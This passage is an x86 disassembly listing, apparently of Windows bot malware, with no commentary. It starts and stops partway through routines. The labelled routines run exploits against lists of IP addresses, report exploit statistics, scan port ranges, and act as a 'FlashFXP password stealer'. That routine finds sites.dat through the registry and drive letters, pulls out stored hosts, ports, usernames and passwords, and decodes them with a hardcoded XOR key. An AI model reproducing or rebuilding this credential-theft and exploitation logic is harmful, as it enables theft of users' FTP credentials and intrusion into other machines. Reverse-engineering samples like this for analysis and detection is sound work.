mov esi, eax
pop ecx
cmp esi, edi
jz short loc_40E9CC
lea eax, [ebp+var_160]
push 14Ch
push eax
push esi
call sub_410838 ; memcpy
inc [ebp+var_8]
push esi
push offset sub_40E03D
mov [esi+3Eh], ebx
call sub_406541
add esp, 14h
test eax, eax
jnz short loc_40E9AE
push ebx
call sub_403D49
push esi
call sub_410832 ; free
pop ecx
pop ecx
jmp short loc_40E9CC
; ---------------------------------------------------------------------------
loc_40E9AE: ; CODE XREF: sub_40E7C8+1D4�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_304]
push [ebp+var_10]
push offset dword_416C70
push eax
call sub_408D50
add esp, 10h
loc_40E9CC: ; CODE XREF: sub_40E7C8+199�j
; sub_40E7C8+1AA�j ...
add [ebp+var_4], 3Ah
mov eax, [ebp+var_4]
cmp [eax+2Eh], edi
jnz loc_40E845
loc_40E9DC: ; CODE XREF: sub_40E7C8+70�j
lea eax, [ebp+var_14]
push eax
push offset dword_412F18
push edi
call sub_405733
add esp, 0Ch
mov [ebp+var_10], eax
cmp eax, edi
mov eax, [ebp+var_488]
jz short loc_40EA04
cmp [eax+4], edi
jz loc_40E82F
loc_40EA04: ; CODE XREF: sub_40E7C8+231�j
push [ebp+var_C]
push [ebp+var_8]
push dword ptr [eax]
lea eax, [ebp+var_304]
push offset dword_416C2C
push eax
call sub_408D50
push [ebp+var_488]
call sub_406753
add esp, 18h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_40E7C8 endp
; =============== S U B R O U T I N E =======================================
sub_40EA34 proc near ; CODE XREF: sub_40735A+4AA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_4], 0
push esi
jz short loc_40EA8C
push 327h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40EA8C
push 180h
lea eax, [esi+4]
push [esp+8+arg_4]
push eax
call sub_4052A6
push 1A3h
lea eax, [esi+184h]
push [esp+14h+arg_0]
push eax
call sub_410838 ; memcpy
add esp, 18h
push offset aAttemptingToEx ; "Attempting to exploit IP's in list."
push 0
push esi
push offset sub_40E7C8
call sub_40663C
add esp, 10h
loc_40EA8C: ; CODE XREF: sub_40EA34+6�j
; sub_40EA34+17�j
pop esi
retn
sub_40EA34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EA8E proc near ; DATA XREF: sub_40EB64+29�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1BC]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
lea eax, [ebp+var_3BC]
push offset aExploitStatist ; "Exploit statistics - "
push eax
call sub_410820 ; _mbscpy
xor ebx, ebx
add esp, 18h
cmp byte ptr dword_416768, bl
jz short loc_40EB39
push esi
mov esi, offset dword_416768
mov eax, esi
loc_40EADA: ; CODE XREF: sub_40EA8E+A8�j
push 12h
push eax
lea eax, [ebp+var_14]
push eax
call sub_4052A6
lea eax, [ebp+var_14]
push eax
call sub_40AC4E
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_3BC]
push eax
call sub_410856 ; _mbscat
add esp, 18h
lea eax, [ebp+var_3BC]
push dword ptr [esi+2Ah]
push offset dword_416CF4
push eax
call sub_410826 ; strlen
pop ecx
lea eax, [ebp+eax+var_3BC]
push eax
call sub_410844 ; sprintf
add esp, 0Ch
cmp [ebp+var_21], bl
jz short loc_40EB2F
mov [esi+2Ah], ebx
loc_40EB2F: ; CODE XREF: sub_40EA8E+9C�j
add esi, 3Ah
mov eax, esi
cmp [esi], bl
jnz short loc_40EADA
pop esi
loc_40EB39: ; CODE XREF: sub_40EA8E+42�j
lea eax, [ebp+var_3BC]
mov [ebp+var_20], bl
push eax
lea eax, [ebp+var_1B8]
push eax
call sub_408D50
push [ebp+var_1BC]
call sub_406753
add esp, 0Ch
xor eax, eax
pop ebx
leave
retn 4
sub_40EA8E endp
; =============== S U B R O U T I N E =======================================
sub_40EB64 proc near ; CODE XREF: sub_40735A+4E7�p
arg_0 = dword ptr 4
push esi
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40EB9A
push [esp+4+arg_0]
lea eax, [esi+4]
push eax
call sub_403E60
pop ecx
pop ecx
push offset aListingExploit ; "Listing exploit statistics"
push 0
push esi
push offset sub_40EA8E
call sub_40663C
add esp, 10h
loc_40EB9A: ; CODE XREF: sub_40EB64+10�j
pop esi
retn
sub_40EB64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB9C proc near ; DATA XREF: sub_40EC6F+AF�o
var_2B4 = dword ptr -2B4h
var_2B0 = byte ptr -2B0h
var_1B0 = byte ptr -1B0h
var_1AA = dword ptr -1AAh
var_1A6 = byte ptr -1A6h
var_E = byte ptr -0Eh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2B4h
push esi
push 2B1h
push [ebp+arg_0]
lea eax, [ebp+var_2B4]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
call sub_41084A ; clock
push [ebp+var_1AA]
mov esi, eax
lea eax, [ebp+var_1B0]
push 0
push eax
lea eax, [ebp+var_2B0]
push eax
call sub_403BBB
add esp, 20h
test eax, eax
jz short loc_40EC1E
push eax
call sub_403D49
pop ecx
call sub_41084A ; clock
sub eax, esi
push eax
lea eax, [ebp+var_1B0]
push eax
lea eax, [ebp+var_2B0]
push eax
lea eax, [ebp+var_1A6]
push offset dword_416DA0
push eax
call sub_408D50
add esp, 14h
jmp short loc_40EC5C
; ---------------------------------------------------------------------------
loc_40EC1E: ; CODE XREF: sub_40EB9C+4D�j
cmp [ebp+var_E], 0
jnz short loc_40EC5C
call sub_41084A ; clock
sub eax, esi
cmp eax, [ebp+var_1AA]
lea eax, [ebp+var_1B0]
push eax
lea eax, [ebp+var_2B0]
push eax
jb short loc_40EC48
push offset dword_416D68
jmp short loc_40EC4D
; ---------------------------------------------------------------------------
loc_40EC48: ; CODE XREF: sub_40EB9C+A3�j
push offset dword_416D38
loc_40EC4D: ; CODE XREF: sub_40EB9C+AA�j
lea eax, [ebp+var_1A6]
push eax
call sub_408D50
add esp, 10h
loc_40EC5C: ; CODE XREF: sub_40EB9C+80�j
; sub_40EB9C+86�j
push [ebp+var_2B4]
call sub_406753
pop ecx
xor eax, eax
pop esi
leave
retn 4
sub_40EB9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC6F proc near ; CODE XREF: sub_40735A+DC2�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
jz loc_40ED2B
mov ebx, [ebp+arg_8]
test ebx, ebx
jnz short loc_40EC8B
mov ebx, offset a80 ; "80"
loc_40EC8B: ; CODE XREF: sub_40EC6F+15�j
push ebx
call sub_41088C ; atoi
test eax, eax
pop ecx
jz loc_40ED2B
cmp eax, 0FFFFh
ja loc_40ED2B
cmp [ebp+arg_C], 0
jz short loc_40ECB8
push [ebp+arg_C]
call sub_41088C ; atoi
pop ecx
mov edi, eax
jmp short loc_40ECBD
; ---------------------------------------------------------------------------
loc_40ECB8: ; CODE XREF: sub_40EC6F+3A�j
mov edi, 0EA60h
loc_40ECBD: ; CODE XREF: sub_40EC6F+47�j
test edi, edi
jz short loc_40ED2B
cmp edi, 36EE80h
ja short loc_40ED2B
push 2B1h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40ED2B
push 100h
lea eax, [esi+4]
push [ebp+arg_4]
push eax
call sub_4052A6
push 6
lea eax, [esi+104h]
push ebx
push eax
call sub_4052A6
push [ebp+arg_0]
lea eax, [esi+10Eh]
mov [esi+10Ah], edi
push eax
call sub_403E60
add esp, 20h
push ebx
push [ebp+arg_4]
push offset dword_416DD0
push 0
push esi
push offset sub_40EB9C
call sub_40663C
add esp, 18h
loc_40ED2B: ; CODE XREF: sub_40EC6F+A�j
; sub_40EC6F+25�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40EC6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED30 proc near ; DATA XREF: sub_40EF0E+169�o
var_2E0 = qword ptr -2E0h
var_2C8 = dword ptr -2C8h
var_2C4 = byte ptr -2C4h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2C8h
push ebx
push 2B3h
push [ebp+arg_0]
lea eax, [ebp+var_2C8]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
push [ebp+var_1BC]
mov ebx, [ebp+var_1C4]
call sub_403925
add esp, 14h
mov [ebp+arg_0], eax
test eax, eax
jnz short loc_40ED84
push [ebp+var_2C8]
call sub_406753
pop ecx
xor eax, eax
jmp loc_40EF09
; ---------------------------------------------------------------------------
loc_40ED84: ; CODE XREF: sub_40ED30+3F�j
movzx eax, word ptr [ebp+var_1C4+2]
push esi
push edi
push [ebp+var_1BC]
push eax
movzx eax, word ptr [ebp+var_1C4]
push eax
lea eax, [ebp+var_2C4]
push eax
mov eax, [ebp+var_2C8]
push dword ptr [eax]
lea eax, [ebp+var_1B8]
push offset dword_416E40
push eax
call sub_408D50
mov esi, ds:dword_4110A4
add esp, 1Ch
cmp [ebp+var_20], 0
mov edi, 3E8h
jnz short loc_40EDD3
push edi
call esi ; Sleep
loc_40EDD3: ; CODE XREF: sub_40ED30+9E�j
call sub_41084A ; clock
and [ebp+var_8], 0
mov [ebp+var_4], eax
loc_40EDDF: ; CODE XREF: sub_40ED30+10D�j
; sub_40ED30+186�j
mov eax, [ebp+var_2C8]
cmp dword ptr [eax+4], 0
jnz loc_40EEBB
cmp bx, word ptr [ebp+var_1C4+2]
ja loc_40EEBB
lea eax, [ebp+var_10]
push 0Ah
push eax
movzx eax, bx
push eax
call sub_410C9A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_10]
inc ebx
push [ebp+arg_0]
mov [ebp+var_14], ebx
push 0
push eax
lea eax, [ebp+var_2C4]
push eax
call sub_403AFB
add esp, 0Ch
push eax
call sub_40394D
pop ecx
test eax, eax
pop ecx
jz short loc_40EE3F
cmp bx, word ptr [ebp+var_1C4+2]
jbe short loc_40EDDF
loc_40EE3F: ; CODE XREF: sub_40ED30+104�j
push [ebp+var_1C0]
call esi ; Sleep
push [ebp+arg_0]
call sub_4039D2
test eax, eax
pop ecx
jz short loc_40EEAA
loc_40EE54: ; CODE XREF: sub_40ED30+178�j
mov eax, [ebp+var_2C8]
cmp dword ptr [eax+4], 0
jnz short loc_40EEAA
push [ebp+arg_0]
call sub_403A6C
test eax, eax
pop ecx
jz short loc_40EEAA
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_403536
pop ecx
mov bl, [ebp+var_20]
pop ecx
lea eax, [ebp+var_10]
inc [ebp+var_8]
and [ebp+var_20], 0
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_1B8]
push offset dword_416E2C
push eax
call sub_408D50
add esp, 10h
mov [ebp+var_20], bl
push edi
call esi ; Sleep
jmp short loc_40EE54
; ---------------------------------------------------------------------------
loc_40EEAA: ; CODE XREF: sub_40ED30+122�j
; sub_40ED30+12E�j ...
push [ebp+arg_0]
call sub_403AAE
mov ebx, [ebp+var_14]
pop ecx
jmp loc_40EDDF
; ---------------------------------------------------------------------------
loc_40EEBB: ; CODE XREF: sub_40ED30+B9�j
; sub_40ED30+C6�j
push [ebp+var_8]
call sub_41084A ; clock
sub eax, [ebp+var_4]
push ecx
push ecx
mov [ebp+var_4], eax
lea eax, [ebp+var_2C4]
fild [ebp+var_4]
fmul ds:flt_411280
fstp [esp+2E0h+var_2E0]
push eax
lea eax, [ebp+var_1B8]
push offset unk_416DF0
push eax
call sub_408D50
push [ebp+arg_0]
call sub_403AE6
push [ebp+var_2C8]
call sub_406753
add esp, 20h
xor eax, eax
pop edi
pop esi
loc_40EF09: ; CODE XREF: sub_40ED30+4F�j
pop ebx
leave
retn 4
sub_40ED30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF0E proc near ; CODE XREF: sub_40735A+55B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
jz loc_40F084
mov eax, [ebp+arg_8]
test eax, eax
jz loc_40F084
cmp [ebp+arg_C], 0
jnz short loc_40EF33
mov [ebp+arg_C], eax
loc_40EF33: ; CODE XREF: sub_40EF0E+20�j
push eax
call sub_41088C ; atoi
mov edi, eax
pop ecx
test edi, edi
mov [ebp+arg_8], edi
jz loc_40F084
mov esi, 0FFFFh
cmp edi, esi
ja loc_40F084
push [ebp+arg_C]
call sub_41088C ; atoi
mov ebx, eax
pop ecx
test ebx, ebx
mov [ebp+var_4], ebx
jz loc_40F084
cmp ebx, esi
ja loc_40F084
push 2B3h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz loc_40F084
cmp edi, ebx
jbe short loc_40EF91
mov [ebp+var_4], edi
mov [ebp+arg_8], ebx
loc_40EF91: ; CODE XREF: sub_40EF0E+7B�j
cmp [ebp+arg_10], 0
mov edi, 7D0h
jz short loc_40EFAA
push [ebp+arg_10]
call sub_41088C ; atoi
pop ecx
mov [ebp+arg_C], eax
jmp short loc_40EFAD
; ---------------------------------------------------------------------------
loc_40EFAA: ; CODE XREF: sub_40EF0E+8C�j
mov [ebp+arg_C], edi
loc_40EFAD: ; CODE XREF: sub_40EF0E+9A�j
cmp [ebp+arg_C], 0
mov ebx, 0EA60h
jz short loc_40EFBD
cmp [ebp+arg_C], ebx
jbe short loc_40EFC0
loc_40EFBD: ; CODE XREF: sub_40EF0E+A8�j
mov [ebp+arg_C], edi
loc_40EFC0: ; CODE XREF: sub_40EF0E+AD�j
cmp [ebp+arg_14], 0
mov edi, 100h
jz short loc_40EFD9
push [ebp+arg_14]
call sub_41088C ; atoi
pop ecx
mov [ebp+arg_10], eax
jmp short loc_40EFDC
; ---------------------------------------------------------------------------
loc_40EFD9: ; CODE XREF: sub_40EF0E+BB�j
mov [ebp+arg_10], edi
loc_40EFDC: ; CODE XREF: sub_40EF0E+C9�j
cmp [ebp+arg_10], 0
jz short loc_40EFEB
cmp [ebp+arg_10], 200h
jbe short loc_40EFEE
loc_40EFEB: ; CODE XREF: sub_40EF0E+D2�j
mov [ebp+arg_10], edi
loc_40EFEE: ; CODE XREF: sub_40EF0E+DB�j
push edi
lea eax, [esi+4]
push [ebp+arg_4]
push eax
call sub_41083E ; strncpy
mov ax, word ptr [ebp+arg_8]
add esp, 0Ch
cmp [ebp+arg_C], ebx
mov [esi+104h], ax
mov ax, word ptr [ebp+var_4]
mov [esi+106h], ax
ja short loc_40F01C
mov ebx, [ebp+arg_C]
loc_40F01C: ; CODE XREF: sub_40EF0E+109�j
mov eax, 200h
mov [esi+108h], ebx
cmp [ebp+arg_10], eax
ja short loc_40F02F
mov eax, [ebp+arg_10]
loc_40F02F: ; CODE XREF: sub_40EF0E+11C�j
mov ebx, [ebp+arg_0]
lea edi, [esi+10Ch]
push 1A3h
push ebx
mov [edi], eax
lea eax, [esi+110h]
push eax
call sub_410838 ; memcpy
movzx eax, word ptr [esi+106h]
add esp, 0Ch
push dword ptr [edi]
push eax
movzx eax, word ptr [esi+104h]
push eax
lea eax, [esi+4]
push eax
xor eax, eax
cmp [ebx+18Bh], al
push offset dword_416E88
setz al
push eax
push esi
push offset sub_40ED30
call sub_40663C
add esp, 20h
loc_40F084: ; CODE XREF: sub_40EF0E+B�j
; sub_40EF0E+16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40EF0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F089 proc near ; CODE XREF: sub_40F21F+234�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
lea eax, [ebp+var_4]
push edi
mov edi, [ebp+arg_4]
mov esi, offset dword_412B20
push eax
push esi
push edi
mov ebx, offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
call sub_410892 ; sscanf
add esp, 0Ch
test eax, eax
jz short loc_40F108
inc edi
inc edi
loc_40F0B1: ; CODE XREF: sub_40F089+7D�j
lea eax, [ebp+arg_4]
push eax
push esi
push edi
call sub_410892 ; sscanf
add esp, 0Ch
test eax, eax
jz short loc_40F108
movsx ecx, byte ptr [ebx]
mov eax, [ebp+arg_4]
xor eax, ecx
inc ebx
cmp [ebp+var_4], eax
mov [ebp+arg_4], eax
jl short loc_40F0D8
dec eax
mov [ebp+arg_4], eax
loc_40F0D8: ; CODE XREF: sub_40F089+49�j
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ecx], al
lea eax, [ebp+var_4]
push eax
push esi
push edi
call sub_410892 ; sscanf
add esp, 0Ch
test eax, eax
jz short loc_40F108
inc edi
inc edi
cmp byte ptr [ebx], 0
jnz short loc_40F101
mov ebx, offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
loc_40F101: ; CODE XREF: sub_40F089+71�j
cmp byte ptr [edi], 0
jz short loc_40F10C
jmp short loc_40F0B1
; ---------------------------------------------------------------------------
loc_40F108: ; CODE XREF: sub_40F089+24�j
; sub_40F089+38�j ...
xor eax, eax
jmp short loc_40F115
; ---------------------------------------------------------------------------
loc_40F10C: ; CODE XREF: sub_40F089+7B�j
mov eax, [ebp+arg_0]
push 1
and byte ptr [eax], 0
pop eax
loc_40F115: ; CODE XREF: sub_40F089+81�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F089 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F11A proc near ; CODE XREF: sub_40F21F+2C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
lea eax, [ebp+var_8]
push edi
xor edi, edi
push eax
push 20019h
push edi
push offset aSoftwareClasse ; "SOFTWARE\\Classes\\Applications\\FlashFXP."...
push 80000002h
mov [ebp+var_8], edi
call ds:dword_411000 ; RegOpenKeyExA
mov ebx, [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
push ebx
push edi
push edi
push edi
mov esi, 104h
push [ebp+var_8]
mov [ebp+var_C], esi
call ds:dword_41100C ; RegQueryValueExA
push [ebp+var_8]
mov [ebp+arg_0], eax
call ds:dword_411028 ; RegCloseKey
cmp [ebp+arg_0], edi
jnz short loc_40F1A9
push offset aFlashfxp_exe1 ; "FlashFXP.exe %1"
push 4
push ebx
call sub_4052F1
add esp, 0Ch
cmp eax, edi
mov [ebp+arg_0], eax
jz short loc_40F1A9
push offset aSites_dat ; "sites.dat"
push eax
call sub_410820 ; _mbscpy
mov eax, [ebp+arg_0]
lea ecx, [eax+0Fh]
add eax, 9
push ecx
push eax
call sub_410820 ; _mbscpy
add esp, 10h
loc_40F1A4: ; CODE XREF: sub_40F11A+B8�j
; sub_40F11A+F1�j
push 1
pop eax
jmp short loc_40F21A
; ---------------------------------------------------------------------------
loc_40F1A9: ; CODE XREF: sub_40F11A+53�j
; sub_40F11A+6A�j
push esi
push ebx
push offset aProgramfiles ; "ProgramFiles"
call ds:dword_41110C ; GetEnvironmentVariableA
push offset aFlashfxpSites_ ; "\\FlashFXP\\sites.dat"
push ebx
call sub_410856 ; _mbscat
mov esi, offset aRb ; "rb"
push esi
push ebx
call sub_41086E ; fopen
add esp, 10h
test eax, eax
jnz short loc_40F1A4
mov eax, dword_413364
mov [ebp+var_4], eax
loc_40F1DC: ; CODE XREF: sub_40F11A+FC�j
lea eax, [ebp+var_4]
push eax
call ds:dword_4110D0 ; GetDriveTypeA
cmp eax, 5
jz short loc_40F20D
cmp eax, 2
jz short loc_40F20D
lea eax, [ebp+var_4]
push eax
push offset aSflashfxpSites ; "%sFlashFXP\\sites.dat"
push ebx
call sub_410844 ; sprintf
push esi
push ebx
call sub_41086E ; fopen
add esp, 14h
test eax, eax
jnz short loc_40F1A4
loc_40F20D: ; CODE XREF: sub_40F11A+CF�j
; sub_40F11A+D4�j
inc byte ptr [ebp+var_4]
cmp byte ptr [ebp+var_4], 5Ah
jz short loc_40F218
jmp short loc_40F1DC
; ---------------------------------------------------------------------------
loc_40F218: ; CODE XREF: sub_40F11A+FA�j
xor eax, eax
loc_40F21A: ; CODE XREF: sub_40F11A+8D�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F11A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F21F proc near ; DATA XREF: sub_40F515+29�o
var_5C4 = byte ptr -5C4h
var_444 = byte ptr -444h
var_3C4 = byte ptr -3C4h
var_344 = byte ptr -344h
var_2C4 = byte ptr -2C4h
var_244 = dword ptr -244h
var_240 = byte ptr -240h
var_A8 = byte ptr -0A8h
var_9C = byte ptr -9Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5C4h
push 1A7h
lea eax, [ebp+var_244]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
lea eax, [ebp+var_5C4]
push eax
call sub_40F11A
add esp, 14h
test eax, eax
jnz short loc_40F26A
push [ebp+var_244]
call sub_406753
pop ecx
xor eax, eax
jmp locret_40F511
; ---------------------------------------------------------------------------
loc_40F26A: ; CODE XREF: sub_40F21F+36�j
mov eax, [ebp+var_244]
push ebx
push esi
push edi
push dword ptr [eax]
lea eax, [ebp+var_240]
push offset unk_417058
push eax
call sub_408D50
mov al, [ebp+var_A8]
xor ebx, ebx
mov byte ptr [ebp+arg_0+3], al
lea eax, [ebp+var_5C4]
push offset aRb ; "rb"
push eax
mov [ebp+var_18], ebx
mov [ebp+var_4], ebx
mov [ebp+var_A8], bl
call sub_41086E ; fopen
mov edi, eax
add esp, 14h
cmp edi, ebx
jz loc_40F500
push 2
push ebx
push edi
call sub_410886 ; fseek
push edi
call sub_41085C ; ftell
mov esi, eax
mov eax, 100000h
add esp, 10h
cmp esi, eax
jb short loc_40F2DA
mov esi, eax
loc_40F2DA: ; CODE XREF: sub_40F21F+B7�j
push ebx
push ebx
push edi
call sub_410886 ; fseek
lea eax, [esi+1]
push eax
call sub_41082C ; malloc
add esp, 10h
cmp eax, ebx
mov [ebp+var_10], eax
push edi
jnz short loc_40F301
call sub_410868 ; fclose
pop ecx
jmp loc_40F500
; ---------------------------------------------------------------------------
loc_40F301: ; CODE XREF: sub_40F21F+D5�j
push esi
push 1
push eax
call sub_410880 ; fread
push edi
call sub_410868 ; fclose
mov eax, [ebp+var_10]
add esp, 14h
mov [eax+esi], bl
mov esi, eax
loc_40F31B: ; CODE XREF: sub_40F21F+29D�j
push offset asc_417050 ; "\r\n\r\n["
push esi
call sub_410898 ; strstr
push offset aIp ; "\r\nIP="
push esi
mov edi, eax
call sub_410898 ; strstr
push offset aPort ; "\r\nPort="
push esi
mov [ebp+var_14], eax
call sub_410898 ; strstr
push offset aUser_0 ; "\r\nUser="
push esi
mov [ebp+var_8], eax
call sub_410898 ; strstr
push offset aPass_0 ; "\r\nPass="
push esi
mov [ebp+var_C], eax
call sub_410898 ; strstr
add esp, 28h
cmp [ebp+var_14], ebx
mov [ebp+var_1C], eax
jz loc_40F4B2
cmp edi, ebx
jz short loc_40F379
cmp [ebp+var_14], edi
jnb loc_40F4B2
loc_40F379: ; CODE XREF: sub_40F21F+14F�j
cmp [ebp+var_8], ebx
jz loc_40F4B2
cmp edi, ebx
jz short loc_40F38F
cmp [ebp+var_8], edi
jnb loc_40F4B2
loc_40F38F: ; CODE XREF: sub_40F21F+165�j
cmp [ebp+var_C], ebx
jz loc_40F4B2
cmp edi, ebx
jz short loc_40F3A5
cmp [ebp+var_C], edi
jnb loc_40F4B2
loc_40F3A5: ; CODE XREF: sub_40F21F+17B�j
cmp eax, ebx
jz loc_40F4B2
cmp edi, ebx
jz short loc_40F3B9
cmp eax, edi
jnb loc_40F4B2
loc_40F3B9: ; CODE XREF: sub_40F21F+190�j
lea eax, [ebp+var_444]
mov [ebp+var_9C], bl
push eax
push offset asc_417024 ; "[%[^]]]\r\n"
push esi
mov [ebp+var_344], bl
mov [ebp+var_3C4], bl
mov [ebp+var_2C4], bl
mov [ebp+var_444], bl
call sub_410892 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_2C4]
push eax
push offset aIp127s ; "\r\nIP=%127s\r\n"
push [ebp+var_14]
call sub_410892 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_3C4]
push eax
push offset aPort127s ; "\r\nPort=%127s\r\n"
push [ebp+var_8]
call sub_410892 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_344]
push eax
push offset aUser127s ; "\r\nUser=%127s\r\n"
push [ebp+var_C]
call sub_410892 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_9C]
push eax
push offset aPass127s ; "\r\nPass=%127s\r\n"
push [ebp+var_1C]
call sub_410892 ; sscanf
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_9C]
push eax
call sub_40F089
add esp, 14h
test eax, eax
jz short loc_40F4C1
inc [ebp+var_4]
push 3E8h
call ds:dword_4110A4 ; Sleep
lea eax, [ebp+var_444]
push eax
lea eax, [ebp+var_3C4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_240]
push [ebp+var_4]
push offset dword_416FB8
push eax
call sub_408D50
mov eax, [ebp+var_244]
add esp, 20h
cmp [eax+4], ebx
jnz short loc_40F4C1
loc_40F4B2: ; CODE XREF: sub_40F21F+147�j
; sub_40F21F+154�j ...
inc [ebp+var_18]
cmp edi, ebx
jz short loc_40F4C1
lea esi, [edi+4]
jmp loc_40F31B
; ---------------------------------------------------------------------------
loc_40F4C1: ; CODE XREF: sub_40F21F+23E�j
; sub_40F21F+291�j ...
push [ebp+var_10]
call sub_410832 ; free
mov al, byte ptr [ebp+arg_0+3]
pop ecx
push 3E8h
mov [ebp+var_A8], al
call ds:dword_4110A4 ; Sleep
push [ebp+var_18]
mov eax, [ebp+var_244]
push [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+var_240]
push offset unk_416F7C
push eax
call sub_408D50
add esp, 14h
loc_40F500: ; CODE XREF: sub_40F21F+96�j
; sub_40F21F+DD�j
push [ebp+var_244]
call sub_406753
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
locret_40F511: ; CODE XREF: sub_40F21F+46�j
leave
retn 4
sub_40F21F endp
; =============== S U B R O U T I N E =======================================
sub_40F515 proc near ; CODE XREF: sub_40735A+323�p
arg_0 = dword ptr 4
push esi
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40F54B
push [esp+4+arg_0]
lea eax, [esi+4]
push eax
call sub_403E60
pop ecx
pop ecx
push offset aFlashfxpPasswo ; "FlashFXP password stealer"
push 0
push esi
push offset sub_40F21F
call sub_40663C
add esp, 10h
loc_40F54B: ; CODE XREF: sub_40F515+10�j
pop esi
retn
sub_40F515 endp
; =============== S U B R O U T I N E =======================================
sub_40F54D proc near ; DATA XREF: sub_40FCB2+32�o
mov eax, offset loc_410CF0
call sub_410B38
sub esp, 0F98h
push ebx
push esi
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-290h]
push eax
call sub_410838 ; memcpy
push dword ptr [ebp+8]
call sub_410832 ; free
add esp, 10h
xor ebx, ebx
lea eax, [ebp-14h]
push ebx
push ebx
push ebx
push eax
mov [ebp-4], ebx
mov [ebp-14h], ebx
call dword_417BB0
cmp eax, ebx
jge short loc_40F5A9
push dword ptr [ebp-290h]
call sub_406753
pop ecx
jmp loc_40FC8E
; ---------------------------------------------------------------------------
loc_40F5A9: ; CODE XREF: sub_40F54D+49�j
cmp [ebp-14h], ebx
mov byte ptr [ebp-4], 1
mov [ebp-1Ch], ebx
jnz short loc_40F5BF
push 80004003h
call sub_410B60
loc_40F5BF: ; CODE XREF: sub_40F54D+66�j
mov esi, [ebp-14h]
lea ecx, [ebp-1Ch]
push ecx
push ebx
mov eax, [esi]
push ebx
push esi
call dword ptr [eax+38h]
cmp eax, ebx
jge short loc_40F5EF
push offset dword_4172E8
push esi
push eax
call sub_410B6E
push dword ptr [ebp-290h]
call sub_406753
pop ecx
jmp loc_40FC7E
; ---------------------------------------------------------------------------
loc_40F5EF: ; CODE XREF: sub_40F54D+83�j
mov eax, [ebp-290h]
push dword ptr [eax]
lea eax, [ebp-28Ch]
push offset unk_4172B4
push eax
call sub_408D50
mov al, [ebp-0F4h]
add esp, 0Ch
